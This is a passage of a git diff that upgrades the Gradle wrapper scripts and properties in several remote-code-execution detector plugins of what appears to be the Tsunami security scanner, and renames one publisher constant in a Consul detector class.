@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/consul/gradlew.bat b/google/detectors/rce/consul/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/consul/gradlew.bat +++ b/google/detectors/rce/consul/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows @@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% 
@@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line @@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal 
diff --git a/google/detectors/rce/consul/src/main/java/com/google/tsunami/plugins/detectors/rce/consul/ConsulEnableScriptChecksCommandExecutionDetector.java b/google/detectors/rce/consul/src/main/java/com/google/tsunami/plugins/detectors/rce/consul/ConsulEnableScriptChecksCommandExecutionDetector.java index 83b13df75..abfa67332 100644 --- a/google/detectors/rce/consul/src/main/java/com/google/tsunami/plugins/detectors/rce/consul/ConsulEnableScriptChecksCommandExecutionDetector.java +++ b/google/detectors/rce/consul/src/main/java/com/google/tsunami/plugins/detectors/rce/consul/ConsulEnableScriptChecksCommandExecutionDetector.java @@ -66,7 +66,7 @@ // nmap returns fmtp for the Consul admin endpoint @ForServiceName({"fmtp"}) public final class ConsulEnableScriptChecksCommandExecutionDetector implements VulnDetector { - @VisibleForTesting static final String VULNERABILITY_REPORT_PUBLISHER = "Google"; + @VisibleForTesting static final String VULNERABILITY_REPORT_PUBLISHER = "GOOGLE"; @VisibleForTesting static final String VULNERABILITY_REPORT_ID = "CONSUL_ENABLE_SCRIPT_CHECKS_COMMAND_EXECUTION"; diff --git a/google/detectors/rce/cve20121823/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/cve20121823/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/cve20121823/gradle/wrapper/gradle-wrapper.jar and b/google/detectors/rce/cve20121823/gradle/wrapper/gradle-wrapper.jar differ diff --git a/google/detectors/rce/cve20121823/gradle/wrapper/gradle-wrapper.properties b/google/detectors/rce/cve20121823/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/google/detectors/rce/cve20121823/gradle/wrapper/gradle-wrapper.properties +++ b/google/detectors/rce/cve20121823/gradle/wrapper/gradle-wrapper.properties 
@@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/google/detectors/rce/cve20121823/gradlew b/google/detectors/rce/cve20121823/gradlew index fbd7c5158..1aa94a426 100755 --- a/google/detectors/rce/cve20121823/gradlew +++ b/google/detectors/rce/cve20121823/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/google/detectors/rce/cve20121823/gradlew.bat b/google/detectors/rce/cve20121823/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/google/detectors/rce/cve20121823/gradlew.bat +++ b/google/detectors/rce/cve20121823/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/google/detectors/rce/cve20171000353/gradle/wrapper/gradle-wrapper.jar b/google/detectors/rce/cve20171000353/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/google/detectors/rce/cve20171000353/gradle/wrapper/gradle-wrapper.jar and 